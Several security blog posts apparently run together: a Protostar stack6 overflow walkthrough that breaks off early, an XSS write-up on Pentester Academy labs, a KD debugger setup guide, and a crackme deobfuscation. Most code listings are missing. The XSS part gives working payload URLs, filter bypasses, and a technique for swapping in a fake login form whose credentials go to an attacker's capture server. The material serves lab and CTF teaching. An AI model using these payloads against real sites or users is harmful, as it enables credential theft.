Ret2Libc and ROP
So far, all of our exploits have included shellcode. On most (if not all) modern systems it isn't possible to just run shellcode like this because of NX.
NX disallows running code in certain memory segments, primarily memory segments that contain variable data, like the stack and heap.
A number of techniques were created to beat NX and I want to demonstrate 2 of them here: return to libc (Ret2Libc) and return-oriented programming (ROP).
This will be slightly different to my previous posts as I will not be hacking an application that I wrote but instead taking on 2 challenges from the Protostar section of Exploit Exercises.
The challenges that we will look at here are stack6 and stack7.
While these challenges have both NX and ASLR disabled, they both implement their own protection which prevents shellcode from being run directly.
Stack6: The App
So if you look at the webpage for stack6, it actually gives you the source code:
The buffer overflow is on line 13. The application then gets the function's return address on line 15 and checks it on line 17.
If the return address begins with bf, the application exits. Stack addresses normally begin with bf, so you cannot just overwrite it with an address on the stack.
One other thing to notice here is that the vulnerable line uses the gets function. This function only stops once it reaches a newline (\n) or end of file (EOF), so we do not need to avoid null (\0) characters.
Stack6: The Easy Way
While I've written this post to demonstrate Ret2Libc and ROP, we can get our shellcode to run on these 2 challenges using the exact same method, which I'll explain quickly here.
Our buffer is 64 bytes long, then we have the local variable ret, which is 4 bytes, then the saved EBP from main's stack frame (another 4 bytes) and finally the return address. It's worth noting that the stack has to be 16-byte aligned, so 8 bytes of padding need to be added before you get to the return address. So we need to write 64+4+4+8 = 80 bytes before we overwrite the return address and hijack EIP.
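The offset arithmetic above can be sketched in Python. This is only an illustration of the sizes described in the text; the variable names and the 0x41414141 placeholder return address are my own assumptions and not values from the challenge.

```python
import struct

# Sizes taken from the description above (32-bit x86).
BUFFER_SIZE = 64      # char buffer
RET_VAR_SIZE = 4      # the local variable ret
SAVED_EBP_SIZE = 4    # saved EBP from main's stack frame
ALIGNMENT_PAD = 8     # padding caused by 16-byte stack alignment

# Number of bytes to write before reaching the saved return address.
offset = BUFFER_SIZE + RET_VAR_SIZE + SAVED_EBP_SIZE + ALIGNMENT_PAD

# Hypothetical placeholder address, packed little-endian as x86 expects.
placeholder_ret = struct.pack("<I", 0x41414141)

payload = b"A" * offset + placeholder_ret
print(offset, len(payload))
```

Piping a payload built like this into the application should crash it with EIP set to the placeholder value, which is a quick way to confirm the offset before using a real address.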
Let's test this:
So we were correct. We can now test what happens if we write an address beginning with bf:
As you can see, we've hit the printf inside the if statement and exited without segfaulting.
If there was a jmp esp instruction (opcode bytes ff e4) in the application code, we could use the same method we used in the Beating ASLR post, but that isn't the case here.
We can still run our shellcode, though, using a slightly more complex method. The application only checks the return address of the current function (note the argument to the __builtin_return_address function call), so we just need to make sure that this address doesn't start with bf.
We'll do this by using 1 ROP "gadget". Let's first find the address of our gadget:
All we're looking for here is a ret instruction. There are a few; we'll use the one on line 258. Its address is 80485a9, so this will be our return address.
After the return address we insert some junk data (4 bytes) and then we will put the address of our shellcode.
First let's find the address that our shellcode will be at. This needs to be done in 2 terminals:
This means our payload will start at 0xbffff780+0xc = 0xbffff78c.
For this challenge I will put the shellcode at the end of the payload. We know the starting address of our payload and how many bytes there are until the shellcode, so our shellcode will be at 0xbffff78c+0x58 = 0xbffff7e4.
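As a quick sanity check, the address arithmetic above can be reproduced in Python. The constants are the values quoted in the text; the names and the starts_with_bf helper are hypothetical and only model the "begins with bf" check as a comparison of the top byte, which is an assumption on my part about how to express it.

```python
# Values quoted in the text.
BASE_ADDR = 0xbffff780        # base address read from the debugger
PAYLOAD_DELTA = 0xc           # the payload starts 0xc bytes after it
SHELLCODE_DELTA = 0x58        # bytes from the payload start to the shellcode
GADGET_ADDR = 0x080485a9      # address of the ret instruction chosen above

payload_start = BASE_ADDR + PAYLOAD_DELTA
shellcode_addr = payload_start + SHELLCODE_DELTA


def starts_with_bf(addr: int) -> bool:
    """Return True if the top byte of a 32-bit address is 0xbf."""
    return (addr >> 24) == 0xbf


print(hex(payload_start), hex(shellcode_addr))
print(starts_with_bf(shellcode_addr), starts_with_bf(GADGET_ADDR))
```

This shows why the shellcode address cannot be used directly as the return address of the checked function, while the gadget address in the application's own code can.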
I first tried with a normal shellcode that I had written but it didn't work:
Reflected XSS at PentesterAcademy
Here I will demonstrate 3 XSS attacks against 3 different challenges on Pentester Academy.
Pentester Academy has a large number of courses and challenges devoted to learning penetration testing and improving your skills.
My aim here will be first to demonstrate basic reflected XSS and then show how 2 different filters can be beaten.
XSS is the ability to execute JavaScript inside the browser of anyone who visits a specific webpage usually by injecting a combination of HTML and JavaScript.
Challenge 16: HTML Injection
The first one we'll look at is challenge 16.
This is the actual challenge page, if you browse to it, you should see this:
What I'm going to do is replace the whole form with one of my own which submits to a server of my choosing and has an extra field but otherwise looks exactly the same as the real one.
First, let's have a look at the vulnerability. We need to see what happens when we submit the form:
I submitted the form with foo in the username field and bar in the password field. This is the full URL that I end up with:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=foo&password=bar
As you can see, this was just submitted to the same page as a GET request. Because of this, we can just manipulate this URL to test the fields. If the form had submitted a POST request, we'd have to keep submitting the form or use something like Burp Suite's Repeater feature.
You can see that the value of the email field has been reflected in the username input box. This is where we can test for a reflected XSS/HTMLi vulnerability.
Before that, let's check the source of this page to see in what context our input has landed. Right click on the page and click something like View Source:
So we've landed inside the value attribute of an input tag.
Now let's check if we can use certain characters by sending the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=foo"<'()[]>&password=bar
It looks like there's little to no filtering here. We've managed to close the input tag with the greater than (>) character that we sent, but let's look at the source:
So, as suspected, there has been no filtering, which makes our job much easier.
Looking at the source code of the vulnerable form, we can figure out any required prefix and suffix:
All we should need to do here is break out of the value attribute and the input tag. To do this we'll need to put a double quote (") (because the value attribute was opened with a ") and a >, respectively, at the start of our input.
We should now test the classic alert box XSS payload with our prefix of "> by sending the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>alert('xss')</script>
It worked. I put the alert statement inside script tags to tell the browser that this is JavaScript to be executed.
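The way the prefix, the script tags and the JavaScript fit together can be sketched with a small Python helper. The build_xss_url function is hypothetical, and percent-encoding the payload is my own addition (the URLs in this post are shown unencoded and the browser handles the rest).

```python
from urllib.parse import quote, unquote

BASE_URL = "http://pentesteracademylab.appspot.com/lab/webapp/htmli/1"
PREFIX = '">'  # closes the value attribute, then the input tag


def build_xss_url(javascript: str) -> str:
    """Wrap JavaScript in script tags, add the prefix and build the URL."""
    payload = PREFIX + "<script>" + javascript + "</script>"
    # safe="" percent-encodes every reserved character in the payload.
    return BASE_URL + "?email=" + quote(payload, safe="")


url = build_xss_url("alert('xss')")
print(url)
# Decoding the parameter again shows the raw payload the page will reflect.
print(unquote(url.split("?email=", 1)[1]))
```

Swapping the argument for other JavaScript gives the later URLs in this post without retyping the prefix and the tags each time.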
If you close the alert box and view the source you should see this:
Using this we can run any JavaScript we want; we just have to replace alert('xss'). As I will demonstrate, this gives us full control over the page that is displayed.
The first thing we need to do is remove the current form so that we can put our own form in its place.
We can find all of the forms on the page using the getElementsByTagName method.
The best way to build your JavaScript payload is to use Firebug. It allows you to write JavaScript dynamically while showing you what methods and attributes each object has available.
If you open Firebug, go to the Console tab and type document. (with the trailing dot), it will show you a list of its methods and attributes.
If you look through the whole source of the webpage you will see that there is only 1 form. getElementsByTagName returns an array-like collection containing all of the form objects, so to access the actual form we need to run document.getElementsByTagName("form")[0], which gives us the first element of the collection:
Each object has a remove method, which we can use to remove the original form.
Also, in JavaScript, all instructions can be put on a single line but they should be separated by a semicolon (;).
Let's try using the XSS to first remove the form using the method described and then trigger an alert box as we did before. For this we will use the following URL:
pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove();alert('xss')</script>
So that didn't work, let's look at the source and see what happened:
So it appears that our payload was cut off at the ;. We can solve this in 2 ways. The first is the easiest and most well known: replace the ; with a URL encoded version (%3b):
pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove()%3balert('xss')</script>
That works, but I also want to show you another method in case semicolons are blocked completely: they can be replaced with commas (,).
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove(),alert('xss')</script>
From this point on I'll use commas to separate the instructions when they are sent to the server, but in my examples while building the JavaScript payload I'll use semicolons.
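Both ways of joining the statements can be generated with a few lines of Python. This is just a sketch; note that Python's quote emits uppercase hex (%3B), which is equivalent to the %3b used above because percent-encoded hex digits are case-insensitive.

```python
from urllib.parse import quote

# The two JavaScript statements used in the URLs above.
statements = [
    'document.getElementsByTagName("form")[0].remove()',
    "alert('xss')",
]

# Option 1: keep the semicolon but percent-encode it.
encoded_semicolon = quote(";", safe="")
option_encoded = encoded_semicolon.join(statements)

# Option 2: avoid the semicolon altogether and use a comma instead.
option_comma = ",".join(statements)

print(option_encoded)
print(option_comma)
```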
Now we need to create the new form. We can do this using the createElement and appendChild methods, as well as the className, innerHTML, placeholder, name, type and action attributes.
Here is a full version of the JavaScript that will build the form that we want and ensure it has all of the necessary attributes to make it look authentic:
All of the information here, especially the class names, I got from the original form. I've created a new form field on line 7 and set its settings on lines 10, 17, 18 and 19.
On line 30, I set the form action to http://localhost:9000/. This means that when the form is submitted it will send the request to localhost on port 9000. This could be set to any value/server under the attacker's control.
The completed form is contained inside the form variable.
The last thing to do is place the form at the right place on the page. If you look through the source, the form is placed inside a div tag with the class container, before a div tag with the class well.
We can find both of these using the getElementsByClassName method and we can insert the form using the insertBefore method. Here is the code for this:
Now we have all of the code we want to run, we just need to shrink it as much as possible. We do this because in any exploit it's best to keep the payload as small as possible so there is less chance of it being noticed.
Firstly, all of the spaces need to be removed; in most situations spaces only make the code easier to read. Next, we can shrink all of the variable names down to 1 character; let's just take the first character of each as its name. Unless use strict; is used on the page (which it isn't), there is no need to declare the variables with the var keyword. Lastly, we use the document object repeatedly, so we can create a variable with a 1 character name that points to it and use the variable instead (d=document;).
After applying the rules above, moving everything to 1 line and replacing the semicolons with commas, you get the following code:
We could probably shrink this down some more but this will do for now.
To send this payload we have to put it in between the script tags. After that you should see the following:
Looking at the source we can see that it has been injected fine:
Python Capture Server
I've written a little Python script using SimpleHTTPServer to capture these details:
This server is set to print the values to stdout and then redirect to the actual application.
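A minimal sketch of a server with that behaviour is shown below. It is not the original script: it uses Python 3's http.server rather than SimpleHTTPServer, it assumes the injected form submits a GET request, and REDIRECT_URL, extract_fields, CaptureHandler and run are all names I have made up for illustration.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Assumption: where the victim is sent after the fields have been captured.
REDIRECT_URL = "http://pentesteracademylab.appspot.com/lab/webapp/htmli/1"


def extract_fields(path: str) -> dict:
    """Return the query-string fields of a request path as a flat dict."""
    query = urlparse(path).query
    return {name: values[0] for name, values in parse_qs(query).items()}


class CaptureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Print every captured field to stdout.
        for name, value in extract_fields(self.path).items():
            print(f"{name}: {value}")
        # Redirect the browser back to the real application.
        self.send_response(302)
        self.send_header("Location", REDIRECT_URL)
        self.end_headers()


def run(port: int = 9000) -> None:
    """Serve forever on localhost; call this manually to start capturing."""
    HTTPServer(("127.0.0.1", port), CaptureHandler).serve_forever()
```

Calling run() starts the listener on port 9000, matching the form action used earlier. The server is deliberately not started on import so that the parsing helper can be tried on its own.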
With the above python server running, when our custom form is submitted you get the following:
And the output on the python server's stdout:
So that is challenge 16 completed for what we wanted to achieve and everything is transparent to the end user, you just need to send the malicious link to the target.
Challenge 16 Secure
The next challenge is here, some filtering has been added to mitigate the previous exploit.
First let's look at the challenge:
This looks exactly the same as the last challenge, so let's use the application and see if that is the same:
So far everything looks the same, even the URL we are sent to:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=foo&password=bar
Let's analyse this application the same way as before by sending the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=foo"<'()[]>
Looks interesting, let's look at the source:
So < and > have been encoded but " hasn't. It looks like we'll have to use an event handler to run our JavaScript this time.
Ideally we want the event handler to run without any interaction, but a lot of the event handlers require some interaction.
We are landing inside an input tag and 1 event we can hook is the onfocus event, but we need to make sure that the input box is in focus when the page loads. For this we can use the autofocus attribute.
So we now need a new prefix for our payload. We need to close the value attribute with a ", then we need a space and the autofocus keyword, then a space and lastly onfocus=". We end up with:
" autofocus onfocus="
After this there is no need to put any script tags. We can't anyway because < and > get encoded.
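To see why this prefix works, the filter and the reflection can be modelled in a few lines of Python. The TEMPLATE string is a hypothetical stand-in for the real input tag and secure_filter only models the behaviour observed above (< and > encoded, " left alone); neither is taken from the application's source.

```python
# Hypothetical stand-in for the vulnerable input tag on the page.
TEMPLATE = '<input type="text" name="email" value="{}">'


def secure_filter(value: str) -> str:
    """Encode < and > but leave double quotes alone, as observed above."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def render(value: str) -> str:
    """Reflect the filtered value inside the value attribute."""
    return TEMPLATE.format(secure_filter(value))


prefix = '" autofocus onfocus="'
rendered = render(prefix + "alert('xss')")
print(rendered)
```

The closing quote that the page adds after our input ends up terminating the onfocus attribute, which is why the payload does not need a suffix.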
Let's try executing an alert box to test if XSS works here, we need to send the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=" autofocus onfocus="alert('xss')
So we can now run JavaScript on this page, we will recreate the exact same attack as last time, the only change we need is to replace every " with a single quote ('), then we end up with this as our JavaScript:
Sending this in place of alert('xss') in our previous request gives us the following:
Looking at the source, we can see how our payload got interpreted:
Now we are in the same position as we were when we'd got our custom form on the other page.
Last Challenge: DOM XSS
This is the last challenge I'd like to demonstrate.
Even though this challenge is very different I want to create the same exploit where I create a custom form and put it on the page in a similar position as the previous examples.
It's quite a bit more difficult to exploit but let's get to it and have a look at how it works:
It's clearly doing some maths here based on the value of the statement argument given in the address bar. Let's look at the source:
So we are landing inside script tags and our input is being used as an argument to eval.
This time, however, we can't see how our payload is being interpreted directly.
We should be able to run any JavaScript inside here though, let's try a normal alert box by sending the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=alert('xss')
That didn't work. Let's open Firebug, open the Console tab and try again (this should show us any errors that happened while it was executing any JavaScript):
So the problem is that the ' characters are URL encoded. This is because, as you can see from the source code, it is accessing the argument using the document.URL property, where certain characters are URL encoded, so we will be unable to use any type of quote (' or ").
There are probably a few ways to beat this problem. An obvious one is to avoid using strings, but we are unable to do that here.
The way I like to get around this is to write the text as a regular expression literal, with forward slashes (/) at the beginning and end, and pass it to String to turn it into a string.
Let's try to execute an alert using this method, we need to send the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=alert(String(/xss/))
So it worked but we have a / on either side of the string. We can use the substring method and the length property to remove these by sending the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=x=String(/xss/),alert(x.substring(1,x.length-1))
We will be using the String and substring methods a lot, so it would be best to create aliases for these to shorten our payload. We can create a function for the substring section like this:
y=function(z){return/**/z.substring(1,z.length-1)}
I have used /**/ here because we are also unable to use spaces (they are URL encoded too) and this just acts as a comment.
This function takes 1 argument and returns the string with the first and last character removed.
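When building longer payloads it can help to generate the quote-free form of each string rather than typing it by hand. The Python sketch below models what y does and wraps arbitrary text in the y(S(/.../)) form; both function names are hypothetical and the checks are deliberately conservative assumptions.

```python
def strip_delimiters(text: str) -> str:
    """Python equivalent of z.substring(1, z.length-1)."""
    return text[1:len(text) - 1]


def quote_free(text: str) -> str:
    """Wrap text as y(S(/text/)), relying on the S and y aliases above."""
    # A slash would end the regular expression early and whitespace would be
    # URL encoded, so this sketch simply rejects both. Characters that are
    # special inside a regular expression would also need care.
    if "/" in text or any(ch.isspace() for ch in text):
        raise ValueError("text cannot be expressed with this trick as-is")
    return "y(S(/" + text + "/))"


print(strip_delimiters("/xss/"))
print(quote_free("xss"))
```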
We can create an alias for the String method using this code:
S=String
Before we start to write our payload, let's test this with an alert by sending the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=S=String,y=function(z){return/**/z.substring(1,z.length-1)},alert(y(S(/xss/)))
So it works. Lastly, all we need to do is remove the string Mathemagic and the div tag that contains the result.
Looking at the source we can see that the Mathemagic string is contained in an h2 tag and there are no other h2 tags on the page, so we can find this using the getElementsByTagName method.
The result is contained inside a div tag which has the id value set to result, so we can find this using the getElementById method.
We can remove both of these using the remove method.
We are now ready to write our payload. Here is the "beautified" version of the payload; remember that this all goes on 1 line, with commas separating the instructions and not semicolons:
So using this the URL that you will need to send is:
After sending this URL you should see the following:
PWNED!!! :-)
Conclusion
For the last two exploits, the redirection URL of the Python server would have to be changed.
XSS exploits can vary greatly, but as long as you can get JavaScript to run you should be able to get full control over the page.
There are various methods for bypassing different filters and I've only mentioned a couple here but the methods that you use will highly depend on the filter that you are facing.
A lot of trial and error is needed to determine how best to bypass the filter that is in place.
In each of these examples, to take advantage of the exploit, you need to send the URL that we have created to the victim. A URL containing all of this information might look very strange to the victim, so it might be best to URL encode the whole payload. You can do this in Burp Suite's Decoder tab or on a website like this. It's worth noting, though, that Burp will URL encode all of the text (including any alphanumeric characters), whereas that website (like most) will only encode certain characters.
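The difference between the two styles of URL encoding can be sketched in Python. encode_selective uses the standard library's quote, which leaves alphanumerics alone, while encode_everything is a hypothetical helper that percent-encodes every byte, similar in effect to what is described for Burp above.

```python
from urllib.parse import quote, unquote


def encode_selective(text: str) -> str:
    """Percent-encode only reserved characters (letters and digits stay)."""
    return quote(text, safe="")


def encode_everything(text: str) -> str:
    """Percent-encode every byte, including alphanumeric characters."""
    return "".join(f"%{byte:02x}" for byte in text.encode("utf-8"))


sample = "alert('xss')"
print(encode_selective(sample))
print(encode_everything(sample))
# Both forms decode back to the same payload.
print(unquote(encode_selective(sample)) == unquote(encode_everything(sample)))
```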
Further Reading
OWASP is the authority on web security so their website contains any relevant information regarding this.
The OWASP XSS page and XSS filter evasion cheat sheet are very good resources.
Also, the OWASP testing guide has a great page on how to go about testing for XSS.
Usermode Application Debugging Using KD
I have started the Windows kernel hacking section with a simple explanation of the setup and a quick analysis of the crackme that we analysed here, using the kd.exe kernel debugger.
I chose to do this instead of any actual Windows kernel stuff because learning how to use KD is a steep learning curve, so it's probably best to look at something you have already seen.
Setting Up The Environment
For this post I will be using a total of 4 machines: 3 virtual machines using VMware Player (you probably could use VirtualBox for this as well) hosted on a reasonably powerful machine, and a laptop.
You can however do all of this with just 1 physical machine, hosting 1 virtual machine and I will explain the differences in the setup afterwards but I'll first explain the setup I am using.
Here is a visual representation of the network:
So I have 3 virtual machines on my machine running VMware Player:
1 Kali Linux, 1 Windows XP Professional and 1 Windows 7 Home Edition. All 3 of these are 32-bit. It doesn't really matter, but to follow along you would probably want the debuggee (the Windows 7 machine in my setup) to be 32-bit. In my 2 machine setup described below, the host (and debugger) is a Windows 7 64-bit machine.
The Kali machine has 2 network interfaces, 1 set up in Bridged mode (so that I can SSH directly to it):
And the other set up in Host-only mode (so that it has access to the other 2 machines):
The Windows XP machine has 1 network interface set up in Host-only mode:
And the same for the Windows 7 machine:
The Windows XP and Windows 7 machines are also connected via a virtual serial cable, this is for the debugger connection.
The Windows XP machine will be the client (or the debugger):
And the Windows 7 machine will be the server (or the debuggee):
The Windows 7 machine needs both Visual Studio Express 2013 for Windows Desktop and the Windows Driver Kit (WDK) installed on it. You can get them both here.
The Windows XP machine needs Microsoft Windows SDK for Windows 7 installed, which you can get here. To install this you need to install the full version of Microsoft .NET Framework 4, which you can get here (bear in mind that you might need an internet connection while you install these, so just change the network adaptor configuration to NAT and then, once it is installed, change it back to Host-only again).
If the debugger is a Windows 7 machine then you will need to install the same software as on the debuggee.
Once these are installed, it's best to add the path to the kd.exe application to the PATH variable.
You do this by going in to the properties of My Computer and, on Windows 7, going to Advanced system settings->Environment Variables... or, on Windows XP, going to Advanced->Environment Variables..., then scrolling down to Path and clicking Edit.
The path on Windows 7 should be something like C:\Program Files\Windows Kits\8.1\Debuggers\x86 and on Windows XP C:\Program Files\Debugging Tools for Windows (x86).
For remote administration I've installed TightVNC on both of the Windows machines.
I set it up with access through the Kali machine so that I can set up SSH tunnels and get VNC access to the Windows machines without giving them access to the outside network.
After TightVNC is up and running on your Windows machines, you can set up the SSH tunnels like this (for this explanation we'll imagine that the Windows XP machine is on the VMware virtual network with an IP of 172.16.188.130, the Windows 7 machine is on 172.16.188.131 and that our Kali machine is also on this network):
Now if you VNC to 127.0.0.1 you will have access to the Windows XP machine and to 127.0.0.1:1 you will have access to the Windows 7 machine.
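The port mapping behind those two VNC addresses can be sketched as follows. This only builds the ssh command lines, it does not run them, and it is an assumption about how the tunnels could be written: user@kali is a hypothetical login for the Kali machine, and 5900 is the standard port for VNC display 0 (display 1 is 5901).

```python
VNC_BASE_PORT = 5900          # VNC display N listens on 5900 + N
KALI_LOGIN = "user@kali"      # hypothetical SSH login for the Kali machine

# Local VNC display number -> Windows machine on the Host-only network.
targets = {
    0: "172.16.188.130",      # Windows XP (debugger)
    1: "172.16.188.131",      # Windows 7 (debuggee)
}


def tunnel_command(display: int, target_ip: str) -> list:
    """Build an ssh local port forward for one VNC display."""
    local_port = VNC_BASE_PORT + display
    forward = f"{local_port}:{target_ip}:{VNC_BASE_PORT}"
    # -N: do not run a remote command, -L: forward a local port.
    return ["ssh", "-N", "-L", forward, KALI_LOGIN]


for display, ip in targets.items():
    print(" ".join(tunnel_command(display, ip)))
```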
1 VM Setup
You can also set this up with 2 machines: the VMware host (running Windows, which will be the debugger) and the VMware guest (also running Windows, which will be the debuggee).
The serial port configuration for the debuggee in VMware in this setup should look like this:
Notice the different file path and name for Windows. The other end should be set to The other end is an application and Yield CPU on poll should be checked.
The only other thing that is different is the command you will use to launch KD on the debugger (we haven't got to that yet but it is shown below for my 4 machine setup). You should instead use kd -k com:port=\\.\pipe\com_1,pipe.
Using KD
On Windows 7 (the debuggee) you will need to tell it to launch the debugger on boot. For this you need to open an Administrator command prompt and run:
The DEBUGPORT:2 option here is the port number of the COM port that you are going to use, for me it was COM2 hence the number 2.
Now we launch the kernel debugger on the Windows XP machine (this is the command that is different on the 2 machine setup):
Again the port=1 option here is the COM port that you are going to be using, I will be using COM1 on this machine hence the 1.
Then reboot the Windows 7 machine and watch the KD terminal on the Windows XP machine:
Now run the crackme application on the debuggee (Windows 7):
Go back to the Windows XP machine and in the debugger terminal window press Control + C:
Now we have broken into the kernel. This means that anything we do will be in the context of the kernel, which we can see in the debugger:
On line 1 I run the .process command without any parameters and it tells us the process we are currently in (844bdae8 is the EPROCESS number).
On line 3 I run the !process extension with 0 0 as its arguments, this lists all of the running processes and some details about them, as you can see from lines 5-7, EPROCESS 844bdae8 is the System process, or the kernel.
What we want to do is change the context to our crackme application, which you can see from lines 141-143 has the EPROCESS of 85abfd40:
On line 1 I use the .process command to change the context to our crackme application but before the context can be changed execution needs to be resumed (which is done on line 5).
Now we can set a breakpoint anywhere in the crackme's virtual memory address space. We want to break on the calls to GetDlgItemTextA that were responsible for getting the text in the textboxes of the application (if you are unsure about what I am talking about, please go back and review the previous post):
Now that the breakpoint is set we can resume execution, wait for it to be hit and inspect the memory.
Remember that the prototype for GetDlgItemText is:
On line 5 I use the dd command to display the 4 double words at the top of the stack. The first dword will be the return address (as you will see in a minute), then we have the first 3 arguments.
The 3rd argument is the address of the buffer for the string; on line 7 I use the da command to display the ASCII string at that address.
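The layout of those 4 dwords at function entry can be illustrated with a short Python sketch. Only the return address 0x0040127f comes from this post; the 3 argument values are hypothetical placeholders, and the field names follow the documented parameter names of GetDlgItemText.

```python
import struct

# 16 bytes as they might sit at ESP when the breakpoint is hit.
# Only the return address is real; the argument values are made up.
raw_stack = struct.pack(
    "<4I",
    0x0040127F,  # return address into the crackme
    0x000A01C2,  # hDlg (hypothetical window handle)
    0x000003E8,  # nIDDlgItem (hypothetical control ID)
    0x0012F9A0,  # lpString (hypothetical buffer address)
)

# dd shows little-endian dwords, which is what "<4I" unpacks.
names = ["return address", "hDlg", "nIDDlgItem", "lpString"]
frame = dict(zip(names, struct.unpack("<4I", raw_stack)))

for name, value in frame.items():
    print(f"{name:>14}: {value:08x}")
```

The lpString entry is the value you would pass to da to read the buffer.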
Keep in mind that this is the start of the function so the value hasn't been fetched yet. We can see the returned value by running until we are back in the calling function using the gu command and checking again:
As you can see the value is the same (because we haven't changed the text in the textbox), you can also see the address which it returned back to after executing GetDlgItemTextA was 0040127f, which was the top value on the stack.
Lastly let's resume and make sure it does the same with the other textbox:
Conclusion
This was only a simple tutorial to get the environment set up and get a basic grasp of kd.exe and some of its commands.
This was by no means an exhaustive list of commands and extensions, the debugger comes with many and has very good documentation.
Hopefully you now have a better understanding of how to debug using kd.exe and you now have the environment to do it in.
Further Reading
The Debugging and Automation chapter in Practical Reverse Engineering by Bruce Dang, Alexandre Gazet and Elias Bachaalany.
Also the kd.exe documentation that ships with the WDK or SDK.
Reversing A Simple Obfuscated Application
I created this application as a little challenge and some practice at manually obfuscating an application at the assembly level.
I wrote the application in IA32 assembly and then manually obfuscated it using a couple of different methods.
Here I will show how to solve the challenge in 2 different ways.
Lastly I will show how the obfuscation could have been done better so that it would have been a lot more difficult to solve this using a simple static disassembly.
The Challenge
We are given the static disassembly below of a 32-bit Linux application which says whether or not the author is going to some event:
The challenge is to figure out whether or not the author is going based solely on this static disassembly.
Method 1: The Easy Way
In this method we'll rebuild the application and simply run it to get the answer.
The first step is to copy the instructions into a new nasm file. If we do that we get:
When we try to assemble this we get:
Looking at the lines that have caused the errors:
You can see that it's all lines that have [SIZE] PTR. We will remove any DWORD PTR and BYTE PTR and, for the lines that had BYTE, put that before the first operand, so they end up like this:
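The same kind of clean-up can be automated with a couple of regular expressions. This Python sketch is a slightly simpler variant of the manual edit described above: it drops DWORD PTR entirely and turns BYTE PTR into nasm's byte keyword in the position where it already was. The example instructions in the usage lines are hypothetical and are not taken from the challenge.

```python
import re


def to_nasm(line: str) -> str:
    """Convert objdump-style size specifiers to something nasm accepts."""
    # BYTE PTR [x] becomes byte [x], keeping the size next to its operand.
    line = re.sub(r"\bBYTE PTR\s+", "byte ", line)
    # DWORD PTR is simply dropped, as in the text. This only assembles when
    # the other operand makes the size unambiguous (for example a register).
    line = re.sub(r"\bDWORD PTR\s+", "", line)
    return line


print(to_nasm("mov BYTE PTR [eax],0x41"))
print(to_nasm("mov eax,DWORD PTR [ebx]"))
```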
Now we try to assemble it again:
So there is still a problem with 2 lines. It looks as if these instructions are invalid; this could possibly be data. What we shall do is replace these 2 instructions with the raw opcodes from the disassembly, so our application ends up like this:
If we assemble this and test it out:
So it assembles and links now but we get a segmentation fault. Let's investigate why:
So it looks as if we've landed in the middle of an instruction.
Near the start of the application (on line 16 above), it jumps to a certain memory address which is in the middle of an instruction. The resulting instruction, as seen on line 9, tries to move a value to the address pointed to by the EAX register.
On line 11 you can see that the value in EAX is 0, which is what caused the segfault, as 0 is an invalid memory address.
The reason for this is that the original application jumped to static memory addresses. In our rebuilt application the memory addresses are different, so this will need to be fixed for the application to work.
What we need to do is replace any fixed memory addresses with labels. We can find where in the application the memory addresses are meant to go by looking at the original disassembly.
Once we have done this the resulting application is as follows:
There are a couple of values here (on lines 55, 59 and 60) which look like memory addresses but they aren't valid memory addresses in the original disassembly, so they could just be normal values or, as they are in the same section as the invalid instructions, part of some data.
With this done we can test this application:
So we have our answer, the author is not going :-)
Method 2: The Hard Way
Here we will attempt to understand the application and figure out what the application does without building and running it.
Although you would have needed some understanding of IA32 to do the previous method, obviously you will need a better understanding of it to do this.
The first step would be what we have already done. There would be no need to be able to assemble the application, or even to have a valid nasm file, but we would still need to replace any known addresses with labels because this makes the disassembly significantly easier to read.
For this we will just use the nasm file above (going-or-not-obf-test4.nasm), just because it will make this post a little shorter :-)
What we do now is follow the control flow of the application and simplify it as we go, replacing more complex sequences with simpler ones (or even a single instruction in some cases) and removing any dead instructions (instructions which have no effect on the application at all) altogether.
This process is manual deobfuscation and can be applied to small sections of applications instead of just full applications like the last method.
Let's start with the first instruction, mov edx,eax. This looks like a junk line (or dead code), mainly because it is the first instruction of the application; if this was just a code segment instead of a full application, it would be more likely to be meaningful.
With the second instruction, mov edi,0x25, it is also very difficult to quickly determine its usefulness to the application. What we need to do here is take note of the value inside the EDI register.
The next 4 instructions do something interesting. If you follow the control flow of the application and line the instructions up sequentially you get:
So the 3rd instruction (on line 5) is not related here and is similar to the previous mov instruction. Just make a note that bl contains 0x32.
The other 3 instructions use a technique found in some shellcode to get an address in memory when the code might be loaded at a different point in memory.
It's called the JMP-CALL-POP technique and it gets the address immediately following the call instruction into the register used in the pop instruction.
Knowing this we can replace the entire code above with:
Let's look at the next 4 instructions:
So here, on line 5, we use the EDI register. The code zeroes EAX, sets it to 0xc9 (201) and adds EDI (0x25 or 37) to it, leaving 0xee (238) in EAX. This series of instructions is what is called constant unfolding, where a series of instructions is used to work out the required value instead of just assigning the value to begin with.
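The arithmetic behind this constant unfolding can be checked quickly. This is a small sketch that only uses the values named above (0xc9 and the 0x25 held in EDI); the variable names are illustrative and simply mirror the registers.

```python
# Values taken from the walkthrough above; the names only mirror the registers.
edi = 0x25                       # set earlier by mov edi,0x25
eax = 0                          # EAX is zeroed first
eax = 0xc9                       # then loaded with 0xc9 (201)
eax = (eax + edi) & 0xffffffff   # add EDI, wrapping like a 32-bit register

print(hex(eax))                  # 0xee
```

Folding the constant means replacing all of those steps with a single assignment of 0xee.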
We could use the opposite, a common compiler optimization called constant folding, to decrease the complexity of this code, so these 4 instructions could be replaced by:
The next 5 instructions are:
This set of instructions just sets EBP and ECX to 0 and EDX to 1. Now it's obvious that the instruction at the beginning was dead code because EDX hasn't been used at all and now it has been overwritten.
We can rewrite the application so far in a much more simplified way:
As you can see, this is much easier to read than the previous code that was jumping about all over the place.
